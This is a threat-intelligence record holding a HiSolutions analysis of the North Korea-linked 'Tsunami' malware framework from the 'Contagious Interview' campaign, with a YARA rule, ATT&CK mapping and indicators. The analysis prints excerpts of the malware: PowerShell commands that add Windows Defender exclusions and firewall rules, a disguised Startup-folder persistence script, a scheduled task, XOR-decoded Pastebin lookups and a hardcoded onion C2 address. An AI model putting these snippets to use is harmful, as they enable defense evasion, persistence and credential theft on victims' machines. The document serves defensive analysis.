{
	"id": "318ad40f-9602-427f-af8b-2474490cd5d5",
	"created_at": "2026-04-06T00:06:06.112768Z",
	"updated_at": "2026-04-10T03:28:28.671072Z",
	"deleted_at": null,
	"sha1_hash": "91b33c9e0b7951d98d33f039f6d759dca0855fcd",
	"title": "Rolling in the Deep(Web): Lazarus Tsunami",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 87369,
	"plain_text": "Rolling in the Deep(Web): Lazarus Tsunami\r\nBy Nicolas Sprenger\r\nPublished: 2025-04-25 · Archived: 2026-04-02 12:18:19 UTC\r\nSummary\r\nWhen HiSolutions investigated cryptocurrency theft in a software developers environment in fall\r\n2024, the initial access vector and first stages of malware-deployment were identical to the\r\nongoing „Contagious Interview“-Campaign linked to North Korea.\r\nDuring our analysis we were able to identify a more comprehensive sample of the Tsunami-Framework, a Malware relying\r\non the TOR-Network and Pastebin (a SaaS) for command and control\r\nTsunami has a modular structure, incorporates multiple stealers and deploys two cryptominers. It has\r\nfirst been identified by Luca Di Domenico and Alessio Di Santo.\r\nKey Takeaways\r\nThe „Contagious Interview“-Campaign is ongoing and responsible for the theft of common and less common crypto-currencies.\r\nThe Threat Actor (TA) actively develops new tooling and uses Pastebin-Accounts and TOR .onion-Domains for C2.\r\nThe identified Tsunami-Malware is in active development and incorporates multiple crypto miners and credential\r\nstealers.\r\nAnalysis\r\nWhen we first observed the Tsunami-Framework in an incident, it achieved initial access through\r\nchainloading a malicious BeaverTail-Payload (loader) from the third-party domain “api.npoint.io”\r\nthrough a private GitHub-Repository. When executed, the loader deploys the InvisibleFerret\r\nMalware, as is publicly known from other cases.\r\nOur analysis of the InvisibleFerret file “.n2\\bow” identified that the Framework used a Python-Launcher with the essential parameter configuration below. Examining the variables and their\r\ncontents, we are able to identify the location where the Tsunami Injector and Tsunami Installer are\r\nstored and executed. Additionally, the actors install a Python interpreter, presumably to ensure their\r\nversion requirements are met.\r\n ##### Globals #####\r\n DEBUG_MODE = False\r\n PYTHON_INSTALLER_URL = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\"\r\n APPDATA_ROAMING_DIRECTORY = os.getenv(\"APPDATA\")\r\n TSUNAMI_INJECTOR_NAME = \"Windows Update Script.pyw\"\r\n TSUNAMI_INJECTOR_FOLDER = f\"{APPDATA_ROAMING_DIRECTORY}/Microsoft/Windows/Start Menu/Programs/Startup\"\r\n TSUNAMI_INJECTOR_PATH = rf\"{TSUNAMI_INJECTOR_FOLDER}/{TSUNAMI_INJECTOR_NAME}\"\r\n TSUNAMI_INJECTOR_SCRIPT = \"\"\"\r\n…\r\n##### Globals #####\r\nhttps://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/\r\nPage 1 of 9\n\nDEBUG_MODE = False\r\nROAMING_APPDATA_PATH = os.getenv(\"APPDATA\")\r\nLOCAL_APPDATA_PATH = os.getenv(\"LOCALAPPDATA\")\r\nTSUNAMI_PAYLOAD_NAME = \"\".join([random.choice(string.ascii_letters) for i in range(16)])\r\nTSUNAMI_PAYLOAD_FOLDER = tempfile.gettempdir()\r\nTSUNAMI_PAYLOAD_PATH = rf\"{TSUNAMI_PAYLOAD_FOLDER}\\{TSUNAMI_PAYLOAD_NAME}\"\r\nTSUNAMI_INSTALLER_NAME = \"Runtime Broker\"\r\nTSUNAMI_INSTALLER_FOLDER = rf\"{ROAMING_APPDATA_PATH}\\Microsoft\\Windows\\Applications\"\r\nTSUNAMI_INSTALLER_PATH = rf\"{TSUNAMI_INSTALLER_FOLDER}\\Runtime Broker.exe\"\r\nTSUNAMI_PAYLOAD_SCRIPT = '''\r\nRandVar = '?'\r\nThe launcher deploys a persistent “Tsunami-Injector” named “Windows Update Script.pyw” in\r\n“AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup” and a “Tsunami_Installer” in\r\n“AppData/Microsoft/Windows/Applications/Runtime Broker.exe”. It then adds a Windows-Defender\r\nExclusion for the “Runtime Broker.exe” and creates a Scheduled Task for secondary persistence.\r\n##### Tsunami Payload #####\r\n def add_windows_defender_exception(filepath: str) -\u003e None:\r\n try:\r\n subprocess.run(\r\n [\"powershell.exe\", f\"Add-MpPreference -ExclusionPath '{filepath}'\"],\r\n shell = True,\r\n creationflags = subprocess.CREATE_NO_WINDOW,\r\n stdout = subprocess.PIPE,\r\n stderr = subprocess.PIPE,\r\n stdin = subprocess.PIPE\r\n )\r\n output(f\"Added a new file to the Windows Defender exception\")\r\n except Exception as e:\r\n output(f\"[-] Failed to add Windows Defender exception: {e}\")\r\ndef create_task() -\u003e None:\r\n powershell_script = f\\\"\\\"\\\"\r\n $Action = New-ScheduledTaskAction -Execute \"{TSUNAMI_INSTALLER_PATH}\"\r\n $Trigger = New-ScheduledTaskTrigger -AtLogOn\r\n $Principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive\r\n $Principal.RunLevel = 1\r\n $Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DontSto\r\n Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -Settings $Settings -Ta\r\n \\\"\\\"\\\"\r\nThe launcher-script contains a list of 1.000 XOR-encrypted Pastebin-User-Urls and checks for\r\nuploaded Pastes, which contain the Download-URL for the “Tsunami-Installer”.\r\n#### URL Downloader #####\r\ndef xor_encrypt(text: bytes):\r\n XOR_KEY = b\"!!!HappyPenguin1950!!!\"\r\nhttps://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/\r\nPage 2 of 9\n\nencrypted_text = bytearray()\r\n for i in range(len(text)):\r\n encrypted_text.append(text[i] ^ XOR_KEY[i % len(XOR_KEY)])\r\n return bytes(encrypted_text)\r\ndef xor_decrypt(text: bytes):\r\n return xor_encrypt(text)\r\ndef decode(encoded: str) -\u003e str:\r\n encoded_bytes = binascii.unhexlify(encoded)\r\n encoded_bytes = xor_decrypt(encoded_bytes)\r\n encoded = base64.b64decode(encoded_bytes).decode()\r\n return encoded[::-1]\r\ndef download_installer_url() -\u003e str:\r\n URLS = [\r\n \"6c5b6c7c2f1d081134225b0b2f2e025b6005764a434c774f7b1d19163e3d091c205419060d76004f52135951406763783b274\r\nc0b172e027675066557437618\r\n4b6d255400291406550d55331e224801035312631145664675\",\r\n…\r\nThe “Tsunami-Installer” was written in .Net and contains further persistence mechanisms. During\r\nexecution, it adds multiple Windows-Defender- and Windows-Firewall-Exclusions and, if successful,\r\ndrops a “TsuAmFlag.txt” in “AppData/Local/Temp”.\r\npowershell.exe Add-MpPreference -ExclusionPath 'C:\\Users\\{USERNAME}\\AppData\\Roaming\\Microsoft\\Windows\\Start Me\r\nMonitor.exe'\r\npowershell.exe Add-MpPreference -ExclusionPath 'C:\\Users\\{USERNAME}\\AppData\\Roaming\\Microsoft\\Windows\\Applicat\r\npowershell.exe Add-MpPreference -ExclusionPath 'C:\\Users\\{USERNAME}\\AppData\\Local\\Microsoft\\Windows\\Applicatio\r\npowershell.exe Add-MpPreference -ExclusionPath 'C:\\Users\\{USERNAME}\\AppData\\Roaming\\Microsoft\\Windows\\Dependen\r\npowershell.exe Add-MpPreference -ExclusionPath 'C:\\Users\\{USERNAME}\\AppData\\Local\\Microsoft\\WindowsApps\\msedge\r\npowershell.exe Add-MpPreference -ExclusionPath 'C:\\Users\\{USERNAME}\\AppData\\Local\\Temp\\\\Runtime Broker.exe'\r\npowershell.exe netsh advfirewall firewall add rule name='Microsoft Edge WebEngine' dir=in action=allow\r\nprogram='C:\\Users\\{USERNAME}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\System Runtime Moni\r\npowershell.exe netsh advfirewall firewall add rule name='Microsoft Edge WebEngine' dir=in action=allow\r\nprogram='C:\\Users\\{USERNAME}\\AppData\\Roaming\\Microsoft\\Windows\\Applications\\Runtime Broker.exe' enable=yes\r\npowershell.exe netsh advfirewall firewall add rule name='Microsoft Edge WebEngine' dir=in action=allow\r\nprogram='C:\\Users\\{USERNAME}\\AppData\\Local\\Microsoft\\Windows\\Applications\\Runtime Broker.exe' enable=yes\r\npowershell.exe netsh advfirewall firewall add rule name='Microsoft Edge WebEngine' dir=in action=allow\r\nprogram='C:\\Users\\{USERNAME}\\AppData\\Roaming\\Microsoft\\Windows\\Dependencies\\System Runtime Monitor.exe' enable\r\npowershell.exe netsh advfirewall firewall add rule name='Microsoft Edge WebEngine' dir=in action=allow\r\nprogram='C:\\Users\\{USERNAME}\\AppData\\Local\\Microsoft\\WindowsApps\\msedge.exe' enable=yes\r\npowershell.exe netsh advfirewall firewall add rule name='Microsoft Edge WebEngine' dir=in action=allow\r\nprogram='C:\\Users\\{USERNAME}\\AppData\\Local\\Temp\\\\Runtime Broker.exe' enable=yes\r\nC:\\Windows\\system32\\netsh.exe advfirewall firewall add rule \"name=Microsoft Edge WebEngine\" dir=in action=allo\r\n\"program=C:\\Users\\{USERNAME}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\System Runtime Moni\r\nC:\\Windows\\system32\\netsh.exe advfirewall firewall add rule \"name=Microsoft Edge WebEngine\" dir=in action=allo\r\n\"program=C:\\Users\\{USERNAME}\\AppData\\Roaming\\Microsoft\\Windows\\Applications\\Runtime Broker.exe\" enable=yes\r\nC:\\Windows\\system32\\netsh.exe advfirewall firewall add rule \"name=Microsoft Edge WebEngine\" dir=in action=allo\r\n\"program=C:\\Users\\{USERNAME}\\AppData\\Local\\Microsoft\\Windows\\Applications\\Runtime Broker.exe\" enable=yes\r\nC:\\Windows\\system32\\netsh.exe advfirewall firewall add rule \"name=Microsoft Edge WebEngine\" dir=in action=allo\r\n\"program=C:\\Users\\{USERNAME}\\AppData\\Roaming\\Microsoft\\Windows\\Dependencies\\System Runtime Monitor.exe\" enable\r\nC:\\Windows\\system32\\netsh.exe advfirewall firewall add rule \"name=Microsoft Edge WebEngine\" dir=in action=allo\r\nhttps://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/\r\nPage 3 of 9\n\nprogram=C:\\Users\\{USERNAME}\\AppData\\Local\\Microsoft\\WindowsApps\\msedge.exe enable=yes\r\nC:\\Windows\\system32\\netsh.exe advfirewall firewall add rule \"name=Microsoft Edge WebEngine\" dir=in action=allo\r\n\"program=C:\\Users\\{USERNAME}\\AppData\\Local\\Temp\\\\Runtime Broker.exe\" enable=yes\r\nDepending on the existence of “TsuAmFlag.txt” the Malware lies dorment for 1 or 5 minutes.\r\nprivate static void DisableWindowsSecurity()\r\n {\r\n int num = AntiDefender.FlagExists() ? 1 : 0;\r\n AntiDefender.DisableWindowsDefender();\r\n AntiDefender.DisableWindowsFirewall();\r\n if (num != 0)\r\n {\r\n Logger.LogInfo(\"Program.DisableWindowsSecurity\", \"Detected Anti Malware flag, sleeping for 1 minute\");\r\n Thread.Sleep(60000);\r\n }\r\n else\r\n {\r\n Logger.LogInfo(\"Program.DisableWindowsSecurity\", \"Did not detect Anti Malware flag, sleeping for 5 min\r\n Thread.Sleep(300000);\r\n }\r\nThe binary further contains a “RessourceLoader” which extracts incorporated PE-Files. Here the Installer extracts a Tor-Client:\r\nnamespace TsunamiInstaller\r\n{\r\n public static class ResourceLoader\r\n {\r\n public static byte[] Load(Resources resource)\r\n {\r\n byte[] resource1 = ResourceLoader.GetResource(resource);\r\n if (resource1.Length == 0)\r\n return new byte[0];\r\n Array.Reverse\u003cbyte\u003e(resource1);\r\n return GZIP.Decompress(resource1);\r\n }\r\n private static byte[] GetResource(Resources resource) =\u003e resource == Resources.TorExecutable ? Resource1.t\r\n }\r\n}\r\nThe deployed Tor-Binary is then used to downlaod a Client from a hardcoded Onion-URL:\r\nnamespace.Tsunami.Core.App\r\n{\r\n public static class Meta\r\n {\r\n private static UsageType _UsageType = UsageType.None;\r\n private static string _AppVersion = \"\";\r\n private static string _AppSessionID = \"\";\r\n private static string _ServerURL = \"\";\r\nhttps://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/\r\nPage 4 of 9\n\npublic static void Init(UsageType type, string appVersion)\r\n {\r\n Meta._UsageType = type;\r\n Meta._AppVersion = appVersion;\r\n Meta._AppSessionID = Guid.NewGuid().ToString();\r\n Meta._ServerURL = \"http://n34kr3z26f3jzp4ckmwuv5ipqyatumdxhgjgsmucc65jac56khdy5zqd.onion\";\r\n }\r\n…\r\nThe downloaded client then contains multiple modules:\r\nBackdoor\r\nBotnet\r\nBraveCredentialStealer\r\nBrowserCookie\r\nBrowserCreditCard\r\nBrowserPassword\r\nBrowserSession\r\nChromeCredentialStealer\r\nChromiumStealer\r\nCryptoMiner\r\nDataStealer\r\nDecryptor\r\nDiscordAccount\r\nEdgeCredentialStealer\r\nEncryptedKey\r\nEthereumMiner\r\nExodusStealer\r\nFirefoxCredentialStealer\r\nGeckoStealer\r\nKeyLogger\r\nInfoStealer\r\nMoneroMiner\r\nNss3\r\nOperaGXCredentialStealer\r\nProfile\r\nSecret\r\nSecretFileStealer\r\nTemperatureTracker\r\nUpdateVisitor\r\nWinApi\r\nThese modules provide multiple solutions for acquiring credentials, session-keys, cookies and a\r\nkeylogger (Backdoor). A recent development has been the “SecretFileStealer” module that searches\r\nfor and uploads files matching conditions that are dynamically loaded from the C2-Server. The\r\n“Botnet” module stands out because it is uncommon for this type of malware. It also seems to be in\r\nthe early stages of development as it is not fully functional in the most recent version.\r\nFor Command-and-Control the Onion-Domain provides multiple Endpoints:\r\n/api/v1/browser-passwords\r\nhttps://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/\r\nPage 5 of 9\n\n/api/v1/browser-sessions\r\n/assets/v2/tsunami-client/file\r\n/api/v1/discord-accounts\r\n/api/v1/environment-info\r\n/assets/v2/tsunami-client/hash\r\n/api/v1/init\r\n/api/v1/telemetry\r\n/assets/v2/dotnet6-installer-url\r\nLike the “Tsunami-Installer” the “Tsunami-Client” contains multiple files:\r\nAMD_Compute_Mode_Enabler.reg\r\nETHW_Miner.exe\r\nLdbdump.exe\r\nTor.exe\r\nXMRig.exe\r\nXmrig_config.json\r\nXMRig_Driver.sys\r\nWe assume the Framework to be in a testing-phase according to the “’rig-id’: ‘test’” in\r\n“Xmrig_config.json” (below).\r\n…\r\n\"pools\": [\r\n {\r\n \"coin\": \"monero\",\r\n \"url\": \"xmrpool.eu:5555\",\r\n \"user\": \"45Kwfu8Q7B18zg5THCz3Jze9YSVn54BPh1tBgzyqJmmUL8YWwXLhs1NV1LCLLv1cJTAHrKhn4cwVNNuzdaydbDXJT\r\n \"pass\": \"x\",\r\n \"rig-id\": \"test\",\r\n \"keepalive\": true,\r\n \"enabled\": true\r\n }\r\n…\r\nDetection and Response\r\nYARA\r\nrule tsunami_framework : apt {\r\n meta:\r\n name = \"tsunami_framework\"\r\n category = \"framework\"\r\n description = \"Detects Tsunami-Framework\"\r\n author = \"Nicolas Sprenger (HiSolutions AG)\"\r\n created = \"2024-12-18\"\r\n reliability = 100\r\n tlp = \"TLP:clear\"\r\n sample = \"ab7608bc7af2c4cdf682d3bf065dd3043d7351ceadc8ff1d5231a21a3f2c6527\"\r\n score = 100\r\nhttps://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/\r\nPage 6 of 9\n\nstrings:\r\n $ = \"=/\\x00a\\x00s\\x00s\\x00e\\x00t\\x00s\\x00/\\x00v\\x002\\x00/\\x00t\\x00s\\x00u\\x00n\\x00a\\x00m\\x00i\\x00-\\x00c\r\n $ = \"/\\x00a\\x00p\\x00i\\x00/\\x00v\\x001\\x00/\\x00b\\x00r\\x00o\\x00w\\x00s\\x00e\\x00r\\x00-\\x00p\\x00a\\x00s\\x00s\\\r\n $ =\r\n\"/\\x00a\\x00p\\x00i\\x00/\\x00v\\x001\\x00/\\x00i\\x00n\\x00i\\x00t\\x00\\x001/\\x00a\\x00p\\x00i\\x00/\\x00v\\x001\\x00/\\x00e\\x0\r\n0n\\x00v\\x00i\\x00r\\x00o\\x00n\\x00m\\x00e\\x00n\r\n\\x00t\\x00-\\x00i\\x00n\\x00f\\x00o\\x00\"\r\n $ = \"a\\x00p\\x00i\\x00/\\x00v\\x001\\x00/\\x00d\\x00i\\x00s\\x00c\\x00o\\x00r\\x00d\\x00-\\x00a\\x00c\\x00c\\x00o\\x00u\\\r\n $ = \"a\\x00s\\x00s\\x00e\\x00t\\x00s\\x00/\\x00v\\x002\\x00/\\x00d\\x00o\\x00t\\x00n\\x00e\\x00t\\x006\\x00-\\x00i\\x00n\\\r\n\\x00u\\x00r\\x00l\"\r\n $ = { 5473756E616D692E436F72652E436F6D6D6F6E2E }\r\n $ = { 680074007400700073003A002F002F006100700069002E00690070006900660079002E006F0072006700 } // \"ht\r\n $ = { 68007400740070003A002F002F006900700069006E0066006F002E0069006F002F00 } // \"http://ipinfo.io/\"\r\n condition:\r\n uint16(0) == 0x5a4d and all of them\r\n}\r\nTTP and Indicators\r\nMITRE ATT\u0026CK TTP\r\nID Technique Comment\r\nT1082 System Information Discovery\r\nDuring Initialization the malware\r\nsends hardware and OS information to the C2.\r\nT1589.001\r\nGather Victim Identity\r\nInformation:\r\nCredentials\r\nMultiple modules collect credentials from browsers\r\nand other applications.\r\nT1587.001 Develop Capabilities: Malware\r\nThe Threat Actor actively develops the Tsunami\r\nmalware.\r\nT1584.005 Compromise Infrastructure: Botnet The malware includes Botnet functionality.\r\nT1608 Stage Capabilities\r\nThe infection chain relies on multiple stages hosted\r\non different systems and services.\r\nT1566 Phishing\r\nThe Threat Actor approaches their\r\nvictims via LinkedIn and poses as a potential\r\nbusiness partner.\r\nT1059\r\nCommand and Scripting\r\nInterpreter\r\nMultiple stages rely on Scripting\r\nInterpreters like JavaScript,\r\nPowerShell and Python.\r\nT1053.005 Scheduled Task/Job\r\nThe malware loader relies on a\r\nScheduled Task for persistence.\r\nT1204 User Execution\r\nThe Initial Access relies on the user executing a\r\nbackdoored GitHub repository.\r\nT1547 Boot or Logon Autostart Execution\r\nThe Tsunami Payload creates a\r\nStartup Task for persistence.\r\nhttps://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/\r\nPage 7 of 9\n\nID Technique Comment\r\nT1562.004\r\nImpair Defenses: Disable or\r\nModify System Firewall\r\nThe Windows Firewall is being\r\ndisabled.\r\nT1562.001\r\nImpair Defenses: Disable or\r\nModify Tools\r\nWindows Defender is being disabled.\r\nT1027 Obfuscated Files or Information\r\nThe initial stages are heavily\r\nobfuscated and later stages are\r\nslightly obfuscated.\r\nT1056 Input Capture\r\nThe malware has Keylogging\r\ncapabilities.\r\nT1539 Steal Web Session Cookie\r\nThe malware exfiltrates Browser\r\nSession Cookies.\r\nT1555 Credentials from Password Stores\r\nMultiple Applications and Browsers are accessed for\r\ncredential access.\r\nT1083 File and Directory Discovery\r\nSpecific files are sought out and\r\nuploaded to the C2 Server.\r\nT1020 Automated Exfiltration\r\nThe malware automatically and\r\nperiodically uploads gathered\r\ninformation.\r\nT1496.001\r\nResource Hijacking: Compute\r\nHijacking\r\nMultiple Cryptominers are deployed by the malware\r\nIndicator of Compromise\r\nValue Type Comment\r\n3f424b477ac16463e871726cbb106d41574d2d0e910dee035fbd23241515e770 SHA256 Tor.exe\r\nb25e1a54e9c53bf6367c449be46f32241d1fd9bf76be9934d42c121105fb497d SHA256 AMD_Compute_Mode_Enable\r\nbb3af0c03e6b0833fa268d98e5a8b19e78fb108a830b58b2ade50c57e9fc9bed SHA256 ETHW_Miner.exe\r\nf96744a85419907e7c442b13beeefb6f985f3905a992dfefee03820ec6570fea SHA256 ldbdump.exe\r\n2883b1ae430003f3eff809f0461e18694ee1e2bc38c98f9eff22a50b5043a770 SHA256 XMRig.exe\r\n94186315edde9ab18d6772449bb0b33a37490c336fccbc81bc7a6b6b728232b1 SHA256 xmrig_config.json\r\n11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 SHA256 XMRig_Driver.sys\r\nC:\\Tsunami\\Tsunami Stable\\Tsunami Client\\obj\\Release\\net6.0\\win-x64\\Runtime Broker.pdbPDB-Path\r\nE:\\Tsunami\\Tsunami Stable\\Tsunami Payload\\obj\\Release\\net6.0\\win-x64\\Tsunami Payload.pdbPDB-Path\r\nC:\\Tsunami\\Tsunami Stable\\Tsunami Client\\obj\\Release\\net6.0\\win-x64\\Runtime Broker.pdbPDB-Path\r\nhttps://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/\r\nPage 8 of 9\n\nValue Type Comment\r\n3769508daa5ee5955c7d0a5493b0a159e874745e575ac6ea1a5b544358132086 SHA256 Packed Sample from Onion\r\n28660b81fd4898da3b9a861af716dc2ed60dd6a6eb582782e9d8451b1f257630 SHA256 Unpacked Sample from Onion\r\na2ae1da09f7508ff34bd9acc672b3cf456e053bb46d4aa3cd283a7f263e37acb SHA256\r\n23.254.229[.]101 IPv4\r\nhttp://23.254.229[.]101/cat-video URL Hosts Tsunami-Installer\r\ne9571e21150d7333bfada0ef836adad555547411a2b56990da632f64d0262ef8 SHA256\r\na2ae1da09f7508ff34bd9acc672b3cf456e053bb46d4aa3cd283a7f263e37acb SHA256 cat-video\r\nn34kr3z26f3jzp4ckmwuv5ipqyatumdxhgjgsmucc65jac56khdy5zqd.onion\r\nC2-\r\nDomain\r\nSometimes you never know the value of a moment until it becomes a memory String\r\nExtensive documentation on this process has been included on\r\nmy YouTube channel: https://www.youtube.com/watch?v=QB7ACr7pUuE\r\nString\r\nheaders = {„User-Agent“:“Mozilla/5.0″} String\r\nXOR_KEY = b“!!!HappyPenguin1950!!!“ String\r\nSource: https://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/\r\nhttps://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/"
	],
	"report_names": [
		"rolling-in-the-deepweb-lazarus-tsunami"
	],
	"threat_actors": [
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775433966,
	"ts_updated_at": 1775791708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/91b33c9e0b7951d98d33f039f6d759dca0855fcd.pdf",
		"text": "https://archive.orkl.eu/91b33c9e0b7951d98d33f039f6d759dca0855fcd.txt",
		"img": "https://archive.orkl.eu/91b33c9e0b7951d98d33f039f6d759dca0855fcd.jpg"
	}
}